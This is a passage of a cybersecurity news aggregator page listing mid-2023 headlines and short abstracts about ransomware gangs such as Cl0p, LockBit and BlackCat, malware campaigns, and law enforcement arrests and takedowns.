Abstract MOVEit-hijacker Cl0p ransomware gang has changed its extortion tactics and is now using torrents to distribute data stolen in the MOVEit Transfer breaches. Previously, the group utilized Tor data leak sites, but this method was slow and easier to shut down. Through torrents, criminals are expecting ... Read More

Cyware

August 7, 2023

Spyware Maker Letmespy Shuts Down After Hacker Deletes Server Data Full Text

Abstract In a notice on its website in both English and Polish, LetMeSpy confirmed the “permanent shutdown” of the spyware service and that it would cease operations by the end of August.

Cyware

August 4, 2023

Married couple pleaded guilty to laundering billions in cryptocurrency stolen from Bitfinex in 2016 Full Text

Abstract A married couple from New York pleaded guilty this week to laundering billions of dollars stolen from Bitfinex in 2016. The couple pleaded guilty to money laundering charges in connection with the hack of the cryptocurrency stock exchange Bitfinex...

Security Affairs

August 02, 2023

Iranian Company Cloudzy Accused of Aiding Cybercriminals and Nation-State Hackers Full Text

Abstract Services offered by an obscure Iranian company known as Cloudzy are being leveraged by multiple threat actors, including cybercrime groups and nation-state crews. "Although Cloudzy is incorporated in the United States, it almost certainly operates out of Tehran, Iran – in possible violation of U.S. sanctions – under the direction of someone going by the name  Hassan Nozari ," Halcyon  said  in a new report published Tuesday. The Texas-based cybersecurity firm said the company acts as a command-and-control provider (C2P), which provides attackers with Remote Desktop Protocol (RDP) virtual private servers and other anonymized services that ransomware affiliates and others use to pull off the cybercriminal endeavors. "[C2Ps] enjoy a liability loophole that does not require them to ensure that the infrastructure they provide is not being used for illegal operations," Halcyon said in a statement shared with The Hacker News. The ransomware-as-a-service (RaaS) busine

The Hacker News

August 01, 2023

Researchers Expose Space Pirates’ Cyber Campaign Across Russia and Serbia Full Text

Abstract The threat actor known as  Space Pirates  has been linked to attacks against at least 16 organizations in Russia and Serbia over the past year by employing novel tactics and adding new cyber weapons to its arsenal. "The cybercriminals' main goals are still espionage and theft of confidential information, but the group has expanded its interests and the geography of its attacks," Positive Technologies  said  in a deep dive report published last week. Targets comprise government agencies, educational institutions, private security companies, aerospace manufacturers, agricultural producers, defense, energy, and healthcare firms in Russia and Serbia. Space Pirates was  first exposed  by the Russian cybersecurity company in May 2022, highlighting its attacks on the aerospace sector in the nation. The group, said to be active since at least late 2019, has links to another adversary tracked by Symantec as  Webworm . Positive Technologies' analysis of the attack infrast

The Hacker News

August 01, 2023

Cybercriminals Renting WikiLoader to Target Italian Organizations with Banking Trojan Full Text

Abstract Organizations in Italy are the target of a new phishing campaign that leverages a new strain of malware called  WikiLoader  with an ultimate aim to install a banking trojan, stealer, and spyware referred to as  Ursnif  (aka Gozi). "It is a sophisticated downloader with the objective of installing a second malware payload," Proofpoint  said  in a technical report. "The malware uses multiple mechanisms to evade detection and was likely developed as a malware that can be rented out to select cybercriminal threat actors." WikiLoader is so named due to the malware making a request to Wikipedia and checking that the response has the string "The Free." The enterprise security firm said it first detected the malware in the wild on December 27, 2022, in connection with an intrusion set mounted by a threat actor it tracks as  TA544 , which is also known as Bamboo Spider and Zeus Panda. The campaigns are centered around the use of emails containing either Micro

The Hacker News

July 27, 2023

China Allegedly Turns to Transnational Criminals to Spread Disinformation in Australia Full Text

Abstract Australian researchers have found evidence that China is using fake social media accounts linked to transnational criminal groups to spread online propaganda and disinformation.

Cyware

July 26, 2023

Fenix Cybercrime Group Poses as Tax Authorities to Target Latin American Users Full Text

Abstract Tax-paying individuals in Mexico and Chile have been targeted by a Mexico-based cybercrime group that goes by the name  Fenix  to breach targeted networks and steal valuable data. A key hallmark of the operation entails cloning official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile and redirecting potential victims to those sites.  "These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety," Metabase Q security researchers Gerardo Corona and Julio Vidal  said  in a recent analysis. "However, unbeknownst to the victims, this download actually installs the initial stage of malware, ultimately enabling the theft of sensitive information such as credentials." The goal of Fenix, according to the Latin America-focused cybersecurity firm, is to act as an initial access broker and get a foothold into different companies in t

The Hacker News

July 26, 2023

FraudGPT: The Villain Avatar of ChatGPT Full Text

Abstract Cybercriminals are using artificial intelligence tools like FraudGPT to create sophisticated phishing attacks and other malicious activities, posing a significant threat to organizations.

Cyware

July 19, 2023

Exploring the Dark Side: OSINT Tools and Techniques for Unmasking Dark Web Operations Full Text

Abstract On April 5, 2023, the FBI and Dutch National Police  announced the takedown of Genesis Market , one of the largest dark web marketplaces. The operation, dubbed "Operation Cookie Monster," resulted in the arrest of 119 people and the seizure of over $1M in cryptocurrency. You can read the FBI's warrant  here  for details specific to this case. In light of these events, I'd like to discuss how OSINT can assist with dark web investigations. The Dark Web's anonymity attracts a variety of users, from whistleblowers and political activists to cybercriminals and terrorists. There are several techniques that can be used to try and identify the individuals behind these sites and personas. Technical Vulnerabilities While not considered OSINT, there have been instances when technical vulnerabilities have existed in the technology used to host dark websites. These vulnerabilities may exist in the software itself or be due to misconfigurations, but they can sometimes revea

The Hacker News

July 19, 2023

Ukraine Police Bust Another Bot Farm Accused of Pro-Russia Propaganda, Internet Fraud Full Text

Abstract Ukraine's Cyber Police shut down yet another bot farm that was reportedly spreading disinformation about the war in Ukraine on social media, just one month after a similar illicit operation was raided in west-central Ukraine.

Cyware

July 18, 2023

FIN8 Group spotted delivering the BlackCat Ransomware Full Text

Abstract The cybercrime group FIN8 is using a revamped version of the Sardonic backdoor to deliver the BlackCat ransomware. The financially motivated group FIN8 (aka Syssphinx) was spotted using a revamped version of a backdoor tracked as Sardonic to deliver...

Security Affairs

July 18, 2023

Black Hat Hacker Exposes Real Identity After Infecting Own Computer With Malware Full Text

Abstract Using the online moniker ‘La_Citrix’, the threat actor has been active on Russian-speaking cybercrime forums since 2020, offering access to hacked companies and info-stealer logs from active infections.

Cyware

July 18, 2023

Go Beyond the Headlines for Deeper Dives into the Cybercriminal Underground Full Text

Abstract Discover stories about threat actors' latest tactics, techniques, and procedures from Cybersixgill's threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT credentials flood dark web markets Over the past year, 100,000 stolen credentials for ChatGPT were advertised on underground sites, being sold for as little as $5 on dark web marketplaces in addition to being offered for free. Stolen ChatGPT credentials include usernames, passwords, and other personal information associated with accounts. This is problematic because ChatGPT accounts may store sensitive information from queries, including confidential data and intellectual property. Specifically, companies increasingly incorporate ChatGPT into daily workflows, which means employees may disclose

The Hacker News

July 18, 2023

FIN8 Group Using Modified Sardonic Backdoor for BlackCat Ransomware Attacks Full Text

Abstract The financially motivated threat actor known as FIN8 has been observed using a "revamped" version of a backdoor called  Sardonic  to deliver the  BlackCat ransomware . According to the Symantec Threat Hunter Team, part of Broadcom, the development is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. The intrusion attempt took place in December 2022. FIN8 is being tracked by the cybersecurity company under the name Syssphinx. Known to be active since at least 2016, the adversary was originally attributed to attacks targeting point-of-sale (PoS) systems using malware such as PUNCHTRACK and BADHATCH. The group resurfaced after more than a year in March 2021 with an updated version of BADHATCH, following it up with a completely new bespoke implant called Sardonic , which was disclosed by Bitdefender in August 2021. "The C++-based Sardonic backdoor has the ability to harvest system information and execute co

The Hacker News

July 18, 2023

Cybercriminals Exploiting WooCommerce Payments Plugin Flaw to Hijack Websites Full Text

Abstract Threat actors are actively exploiting a recently disclosed critical security flaw in the WooCommerce Payments WordPress plugin as part of a massive targeted campaign. The flaw, tracked as  CVE-2023-28121  (CVSS score: 9.8), is a case of authentication bypass that enables unauthenticated attackers to impersonate arbitrary users and perform some actions as the impersonated user, including an administrator, potentially leading to site takeover. "Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023," Wordfence security researcher Ram Gall  said  in a Monday post. Versions 4.8.0 through 5.6.1 of WooCommerce Payments are vulnerable. The plugin is installed on over 600,000 sites. Patches for the bug were released by WooCommerce back in March 2023, with WordPress issuing auto-updates to sites using affected versions of

The Hacker News

July 17, 2023

Admins of Genesis Market marketplace sold their infrastructure on a hacker forum Full Text

Abstract The admins of the darkweb Genesis Market announced the sale of their platform to a threat actor that will restart operations next month. In April, the FBI seized the Genesis Market, a black marketplace for stolen credentials that was launched in 2017....

Security Affairs

July 17, 2023

Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware Full Text

Abstract Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called  LokiBot  on compromised systems. "LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin  said . "It primarily targets Windows systems and aims to gather sensitive information from infected machines." The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of  CVE-2021-40444  and  CVE-2022-30190  (aka Follina) to achieve code execution. The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot. The injector also features evasion techniques to check for the presence of debuggers a

The Hacker News

July 15, 2023

WormGPT: New AI Tool Allows Cybercriminals to Launch Sophisticated Cyber Attacks Full Text

Abstract With generative artificial intelligence (AI) becoming all the rage these days, it's perhaps not surprising that the technology has been repurposed by malicious actors to their own advantage, enabling avenues for accelerated cybercrime. According to findings from SlashNext, a new generative AI cybercrime tool called  WormGPT  has been advertised on underground forums as a way for adversaries to launch sophisticated phishing and business email compromise ( BEC ) attacks. "This tool presents itself as a blackhat alternative to GPT models, designed specifically for malicious activities," security researcher Daniel Kelley  said . "Cybercriminals can use such technology to automate the creation of highly convincing fake emails, personalized to the recipient, thus increasing the chances of success for the attack." The author of the software has described it as the "biggest enemy of the well-known ChatGPT" that "lets you do all sorts of illegal stuff.

The Hacker News

July 13, 2023

Criminals Target Businesses With Malicious Extension for Meta’s Ads Manager and Accidentally Leak Stolen Accounts Full Text

Abstract The Vietnamese threat actors are using malicious Chrome extensions to steal Facebook account credentials, with over 800 victims worldwide and $180K in compromised ad budget.

Cyware

July 12, 2023

Staying ahead of the “professionals”: The service-oriented ransomware crime industry Full Text

Abstract The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional.

Cyware

July 12, 2023

Cl0p hacker operating from Russia-Ukraine war front line – exclusive Full Text

Abstract CyberNews researchers discovered that at least one of the Cl0p ransomware gang masterminds is still residing in Ukraine. Original post at: https://cybernews.com/security/cl0p-hacker-hides-in-ukraine/ As the Cl0p ransomware gang continues to sow anxiety...

Security Affairs

July 12, 2023

Cl0p Crime Group Adds 62 Ernst & Young Clients to Leak Sites Full Text

Abstract The growing list of MOVEit cyberattack victims has grown. Sixty-two clients of Big Four accounting firm Ernst & Young now appear on the Clop ransomware group's data leak sites.

Cyware

July 11, 2023

Cybercriminals Evolve Antidetect Tooling for Mobile OS-Based Fraud Full Text

Abstract Resecurity identified the emergence of adversarial mobile Android-based Antidetect Tooling for Mobile OS-Based Fraud. Resecurity has identified the emergence of adversarial mobile Android-based tools (called "mobile anti-detects"), like Enclave and McFly,...

Security Affairs

July 10, 2023

Genesis Market gang tries to sell platform after FBI disruption Full Text

Abstract Unlike its competitors, Genesis Market did not just sell stolen data and credentials but also provided a platform to criminals that allowed them to weaponize that data using a custom browser extension to impersonate victims.

Cyware

July 10, 2023

Hackers Steal $20 Million by Exploiting Flaw in Revolut’s Payment Systems Full Text

Abstract Malicious actors exploited an unknown flaw in Revolut's payment systems to steal more than $20 million of the company's funds in early 2022. The development was  reported  by the Financial Times, citing multiple unnamed sources with knowledge of the incident. The breach has not been disclosed publicly. The fault stemmed from discrepancies between Revolut's U.S. and European systems, causing funds to be erroneously refunded using its own money when some transactions were declined. The problem was first detected in late 2021. But before it could be closed, the report said organized criminal groups leveraged the loophole by "encouraging individuals to try to make expensive purchases that would go on to be declined." The refunded amounts would then be withdrawn from ATMs. The exact technical details associated with the flaw are currently unclear. About $23 million was stolen in total, with some funds recovered by pursuing those who had withdrawn cash. The mass

The Hacker News

July 06, 2023

INTERPOL Nabs Hacking Crew OPERA1ER’s Leader Behind $11 Million Cybercrime Full Text

Abstract A suspected senior member of a French-speaking hacking crew known as OPERA1ER has been arrested as part of an international law enforcement operation codenamed Nervone, Interpol has announced. "The group is believed to have stolen an estimated USD 11 million -- potentially as much as 30 million -- in more than 30 attacks across 15 countries in Africa, Asia, and Latin America," the agency  said . The arrest was made by authorities in Côte d'Ivoire early last month. Additional insight was provided by the U.S. Secret Service's Criminal Investigative Division and Booz Allen Hamilton DarkLabs. The financially motivated collective is also known by the aliases Common Raven, DESKTOP-GROUP, and NX$M$. Its modus operandi was  first exposed  by Group-IB and Orange CERT Coordination Center (Orange-CERT-CC) in November 2022, detailing its intrusions on banks, financial services, and telecom companies between March 2018 and October 2022. Earlier this January, Broadcom's S

The Hacker News

July 5, 2023

Ransomware Criminals Are Dumping Kids’ Private Files Online After School Hacks Full Text

Abstract Complete sexual assault case folios containing these details were among more than 300,000 files dumped online in March after the 36,000-student Minneapolis Public Schools refused to pay a $1 million ransom.

Cyware

July 5, 2023

Teen among suspects arrested in Android banking malware scheme Full Text

Abstract Preliminary findings suggest that seven men, two women aged 19 to 27, and a 16-year-old facilitated the scam by providing their bank accounts, Internet banking credentials, and Singpass credentials to perpetrators for monetary gain.

Cyware

July 4, 2023

Neo_Net runs eCrime campaign targeting clients of banks globally Full Text

Abstract A Mexican threat actor that goes online with the moniker Neo_Net is behind an Android malware campaign targeting banks worldwide. A joint study conducted by vx-underground and SentinelOne recently revealed that a Mexican threat actor that goes online...

Security Affairs

July 04, 2023

Mexico-Based Hacker Targets Global Banks with Android Malware Full Text

Abstract An e-crime actor of Mexican provenance has been linked to an Android mobile malware campaign targeting financial institutions globally, but with a specific focus on Spanish and Chilean banks, from June 2021 to April 2023. The activity is being attributed to an actor codenamed  Neo_Net , according to security researcher Pol Thill. The findings were published by SentinelOne following a Malware Research Challenge in collaboration with vx-underground. "Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims' bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims," Thill  said . Some of the major targets include banks such as Santander, BBVA, CaixaBank, Deutsche Bank, Crédit Agricole, and ING. Neo_Net, linked to a Spanish-speaking actor residing in Mexico, has established themselves as a

The Hacker News

July 4, 2023

Anonymous Sudan Claims to Have Stolen 30 Million Microsoft’s Customer Accounts Full Text

Abstract Attackers said “We announce that we have successfully hacked Microsoft and have access to a large database containing more than 30 million Microsoft accounts, email and password. Price for full database : 50,000 USD.”

Cyware

July 03, 2023

BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising Full Text

Abstract Threat actors associated with the  BlackCat ransomware  have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application. "Malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations," Trend Micro researchers  said  in an analysis published last week. "In this case, the distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer." Malvertising   refers  to the use of  SEO poisoning techniques  to spread malware via online advertising. It typically involves hijacking a chosen set of keywords to display bogus ads on Bing and Google search results pages with the goal of redirecting unsuspecting users to sketchy pages. The idea is to trick users searching for applications like WinSCP into downloading malware, in this instance, a backdoor that contains a  Cobalt Strike Beacon  that connects to a

The Hacker News

July 1, 2023

LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC Full Text

Abstract The LockBit ransomware gang claims to have hacked Taiwan Semiconductor Manufacturing Company (TSMC). The LockBit ransomware group this week claimed to have hacked the Taiwan Semiconductor Manufacturing Company (TSMC) and $70 million ransom. TSMC...

Security Affairs

June 30, 2023

Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign Full Text

Abstract An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. "This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain," Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node. This offers two-fold benefits: It not only enables the attacker to monetize the extra bandwidth with a significantly reduced resource load that would be necessary to carry out cryptojacking, it also reduces the chances of discovery. "It is a stealthier alternative to cryptojacking and has serious implications that ca

The Hacker News

June 29, 2023

Former Group-IB manager has been arrested in Kazahstan Full Text

Abstract The former head of network security at Group-IB has been arrested in Kazakhstan based on a request from U.S. law enforcement. Nikita Kislitsin who worked as the head of network security at Group-IB, as well as its Russian-based spinoff company (known...

Security Affairs

June 29, 2023

Security analyst wanted by both Russia and the US Full Text

Abstract A Russian network security specialist and former editor of Hacker magazine who is wanted by the US and Russia on cybercrime charges has been detained in Kazakhstan as the two governments seek his extradition.

Cyware

June 28, 2023

CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million Full Text

Abstract Cybersecurity researchers have exposed the workings of a scam ring called CryptosLabs that's estimated to have made €480 million in illegal profits by targeting users in French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate's massive fake investment schemes primarily involve impersonating 40 well-known banks, fin-techs, asset management firms, and crypto platforms, setting up a scam infrastructure spanning over 350 domains hosted on more than 80 servers, Group-IB  said  in a deep-dive report. The Singapore-headquartered company described the criminal outfit as "operated by a hierarchy of kingpins, sales agents, developers, and call center operators" who are recruited to ensnare potential victims by promising high returns on their capital. "CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, socia

The Hacker News

June 28, 2023

EncroChat dismantling led to 6,558 arrests and the seizure of $979M in criminal funds Full Text

Abstract Europol announced that the takedown of the EncroChat encrypted chat network has led to the arrest of 6,558 people and the seizure of $979 million in illicit funds. Europol announced that the dismantling of the encrypted chat network EncroChat has led to the arrest...

Security Affairs

June 28, 2023

8Base ransomware gang escalates double extortion attacks in June Full Text

Abstract ​A 8Base ransomware gang is targeting organizations worldwide in double-extortion attacks, with a steady stream of new victims since the beginning of June.

BleepingComputer

June 27, 2023

EncroChat takedown led to 6,500 arrests and $979 million seized Full Text

Abstract Europol announced today that the takedown of the EncroChat encrypted mobile communications platform has led to the arrest of over 6,600 people and the seizure of $979 million in illicit funds.

BleepingComputer

June 27, 2023

EncroChat Bust Leads to 6,558 Criminals’ Arrests and €900 Million Seizure Full Text

Abstract Europol on Tuesday  announced  that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The law enforcement agency said that a subsequent joint investigation initiated by French and Dutch authorities intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform between no less than 60,000 users. Now almost three years later, the information obtained from digital correspondence has resulted in - Arrests of 6,558 suspects, including 197 high-value targets 7,134 years of imprisonment of convicted criminals Confiscation of €739.7 million in cash Freeze of €154.1 million frozen in assets or bank accounts Seizure of 30.5 million pills of chemical drugs Seizure of 103.5 tonnes of cocaine, 163.4 tonnes of cannabis, and 3.3 tonnes of heroin Seizure of 971 vehicles, 83 boats, and 40 planes Seizure of 271 estates or homes, and Seizure of 923 weapons, as well

The Hacker News

June 26, 2023

Cybercriminals target high-profit companies: AEI Full Text

Abstract Cybercriminals tend to strike highly profitable companies, those holding abundant cash, and organizations that spend generously on advertising, according to an American Enterprise Institute study of cyberattacks from January 1999 until January 2022.

Cyware

June 24, 2023

Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam Full Text

Abstract A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S. Joseph James O'Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month  after  he  pleaded guilty  to the criminal schemes. He was  arrested  in Spain in July 2021. The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about $120,000 in illegal profits. "In other instances, the co-conspirators sold access to Twitter accounts to others," the U.S. Department of Justice (DoJ)  said . "O'Connor communicated with others regarding purchasing unauthorized access to a variety of Twitter accounts, including accounts associated with public figures around the world." The defendant has also been accused o

The Hacker News

June 23, 2023

Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering Full Text

Abstract A threat actor known as  Muddled Libra  is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access. "The attack style defining Muddled Libra appeared on the cybersecurity radar in late 2022 with the release of the 0ktapus phishing kit, which offered a prebuilt hosting framework and bundled templates," Palo Alto Networks Unit 42  said  in a technical report. Libra is the  designation  given by the cybersecurity company for cybercrime groups. The "muddled" moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework. 0ktapus , also known as Scatter Swine, refers to an intrusion set that first came to light in August 2022 in connection with smishing attacks against over 100 organizations, including Twilio and Cloudflare. Then in late 2022, CrowdStrike  detailed  a string of cyber assaults aimed at telecom and BPO co

The Hacker News

June 19, 2023

Diicot cybercrime gang expands its attack capabilities Full Text

Abstract Researchers found evidence that Diicot threat actors are expanding their capabilities with new payloads and the Cayosin Botnet. Cado researchers recently detected an interesting attack pattern linked to an emerging cybercrime group tracked as Diicot...

Security Affairs

June 18, 2023

Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit Full Text

Abstract The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from the Reddit in February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents,...

Security Affairs

June 17, 2023

Law enforcement shutdown a long-standing DDoS-for-hire service Full Text

Abstract Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013. An international operation codenamed PowerOff led to the shutdown of a DDoS-for-hire service...

Security Affairs

June 16, 2023

A Russian national charged for committing LockBit Ransomware attacks Full Text

Abstract DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous...

Security Affairs

June 16, 2023

20-Year-Old Russian LockBit Ransomware Affiliate Arrested in Arizona Full Text

Abstract The U.S. Department of Justice (DoJ) on Thursday unveiled charges against a Russian national for his alleged involvement in deploying LockBit ransomware to targets in the U.S., Asia, Europe, and Africa. Ruslan Magomedovich Astamirov, 20, of Chechen Republic has been accused of perpetrating at least five attacks between August 2020 and March 2023. He was arrested in the state of Arizona last month. "Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware," the DoJ  said . Astamirov, as part of his LockBit-related activities, managed various email addresses, IP addresses, and other online accounts to deploy the ransomware and communicate with the victims. Law enforcement agencies said they were able to trace a chunk of an unnamed victim's ransom payment to a virtual currency address operated by Astam

The Hacker News

June 15, 2023

LockBit Ransomware Extorts $91 Million from U.S. Companies Full Text

Abstract The threat actors behind the  LockBit  ransomware-as-a-service (RaaS) scheme have extorted $91 million following hundreds of attacks against numerous U.S. organizations since 2020. That's according to a  joint bulletin  published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and other partner authorities from Australia, Canada, France, Germany, New Zealand, and the U.K. "The LockBit ransomware-as-a-service (RaaS) attracts affiliates to use LockBit for conducting ransomware attacks, resulting in a large web of unconnected threat actors conducting wildly varying attacks," the agencies  said . LockBit, which first burst onto the scene in late 2019, has continued to be disruptive and prolific, targeting as many as 76 victims in May 2023 alone, per statistics shared by  Malwarebytes  last week. The Russia-linked cartel has claimed responsibil

The Hacker News

June 13, 2023

Two Russian Nationals Charged for Masterminding Mt. Gox Crypto Exchange Hack Full Text

Abstract The U.S. Department of Justice (DoJ) has charged two Russian nationals in connection with masterminding the 2014 digital heist of the now-defunct cryptocurrency exchange Mt. Gox. According to unsealed indictments released last week, Alexey Bilyuchenko, 43, and Aleksandr Verner, 29, have been accused of conspiring to launder approximately 647,000 bitcoins stolen from September 2011 through at least May 2014 as a result of unauthorized access to a server holding crypto wallets used by Mt. Gox customers. "Starting in 2011, Bilyuchenko and Verner stole a massive amount of cryptocurrency from Mt. Gox, contributing to the exchange's ultimate insolvency," Assistant Attorney General Kenneth A. Polite, Jr.  said  in a statement. "Armed with the ill-gotten gains from Mt. Gox, Bilyuchenko allegedly went on to help set up the notorious  BTC-e virtual currency exchange , which laundered funds for cyber criminals worldwide." Bilyuchenko and Verner are also alleged to hav

The Hacker News

June 12, 2023

Cybercriminals Using Powerful BatCloak Engine to Make Malware Fully Undetectable Full Text

Abstract A fully undetectable (FUD) malware obfuscation engine named  BatCloak  is being used to deploy various malware strains since September 2022, while persistently evading antivirus detection. The samples grant "threat actors the ability to load numerous malware families and exploits with ease through highly obfuscated batch files," Trend Micro researchers  said . About 79.6% of the total 784 artifacts unearthed have no detection across all security solutions, the cybersecurity firm added, highlighting BatCloak's ability to circumvent traditional detection mechanisms. The BatCloak engine forms the crux of an off-the-shelf batch file builder tool called Jlaive, which comes with capabilities to bypass Antimalware Scan Interface ( AMSI ) as well as compress and encrypt the primary payload to achieve heightened security evasion. The open-source tool, although taken down since it was made available via GitHub and GitLab in September 2022 by a developer named ch2sh, has been

The Hacker News

June 09, 2023

Asylum Ambuscade: A Cybercrime Group with Espionage Ambitions Full Text

Abstract The threat actor known as  Asylum Ambuscade  has been observed straddling cybercrime and cyber espionage operations since at least early 2020. "It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe," ESET  said  in an analysis published Thursday. "Asylum Ambuscade also does espionage against government entities in Europe and Central Asia." Asylum Ambuscade was  first documented  by Proofpoint in March 2022 as a nation-state-sponsored phishing campaign that targeted European governmental entities in an attempt to obtain intelligence on refugee and supply movement in the region. The goal of the attackers, per the Slovak cybersecurity firm, is to siphon confidential information and web email credentials from official government email portals. The attacks start off with a spear-phishing email bearing a malicious Excel spreadsheet attachment that, when opened, either exploits VBA code o

The Hacker News

June 9, 2023

Clop ransomware gang was testing MOVEit Transfer bug since 2021 Full Text

Abstract Researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since 2021. Kroll security experts discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since...

Security Affairs

June 8, 2023

Asylum Ambuscade: crimeware or cyberespionage? Full Text

Abstract The group targets bank customers and cryptocurrency traders in various regions, including North America and Europe, as well as government entities in Europe and Central Asia.

Cyware

June 7, 2023

Clop ransomware gang claims the hack of hundreds of victims exploiting MOVEit Transfer bug Full Text

Abstract Clop ransomware group claims to have hacked hundreds of companies globally by exploiting MOVEit Transfer vulnerability. The Clop ransomware group may have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer...

Security Affairs

June 7, 2023

0mega ransomware gang changes tactics Full Text

Abstract A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them.

Cyware

June 7, 2023

Clop Ransomware Group Issues Extortion Notice to ‘Hundreds’ of Victims Full Text

Abstract Potentially hundreds of companies globally are being extorted by the Clop ransomware group after it exploited a vulnerability in the file transfer tool MOVEit to break into computer networks around the world and steal sensitive information.

Cyware

June 6, 2023

Cybercriminals target C-suite, family members with sophisticated attacks Full Text

Abstract Senior corporate executives are increasingly being targeted by sophisticated cyberattacks that target their corporate and home office environments and even extend to family members, according to a study from BlackCloak and Ponemon Institute.

Cyware

June 6, 2023

Cyclops Ransomware group offers a multiplatform Info Stealer Full Text

Abstract Researchers from security firm Uptycs reported that threat actors linked to the Cyclops ransomware are offering a Go-based information stealer. The Cyclops group has developed multi-platform ransomware that can infect Windows, Linux, and macOS...

Security Affairs

June 5, 2023

Microsoft blames Clop ransomware gang for ‘MOVEit Transfer’ attacks Full Text

Abstract Microsoft attributes the recent campaign exploiting a zero-day in the MOVEit Transfer platform to the Clop ransomware gang. The Clop ransomware gang (aka Lace Tempest) is credited by Microsoft for the recent campaign that exploits a zero-day vulnerability,...

Security Affairs

June 05, 2023

Brazilian Cybercriminals Using LOLBaS and CMD Scripts to Drain Bank Accounts Full Text

Abstract An unknown cybercrime threat actor has been observed targeting Spanish- and Portuguese-speaking victims to compromise online banking accounts in Mexico, Peru, and Portugal. "This threat actor employs tactics such as LOLBaS (living-off-the-land binaries and scripts), along with CMD-based scripts to carry out its malicious activities," the BlackBerry Research and Intelligence Team  said  in a report published last week. The cybersecurity company attributed the campaign, dubbed Operation CMDStealer , to a Brazilian threat actor based on an analysis of the artifacts. The attack chain primarily leverages social engineering, banking on Portuguese and Spanish emails containing tax- or traffic violation-themed lures to trigger the infections and gain unauthorized access to victims' systems. The emails come fitted with an HTML attachment that contains obfuscated code to fetch the next-stage payload from a remote server in the form of a RAR archive file. The files, which are

The Hacker News

June 5, 2023

Spanish bank Globalcaja confirms Play ransomware attack Full Text

Abstract Play ransomware group claims responsibility for a ransomware attack that hit Globalcaja, one of the major banks in Spain. Globalcaja is a financial institution in the autonomous community of Castilla-La Mancha, it has more than 300 offices across...

Security Affairs

June 01, 2023

Unmasking XE Group: Experts Reveal Identity of Suspected Cybercrime Kingpin Full Text

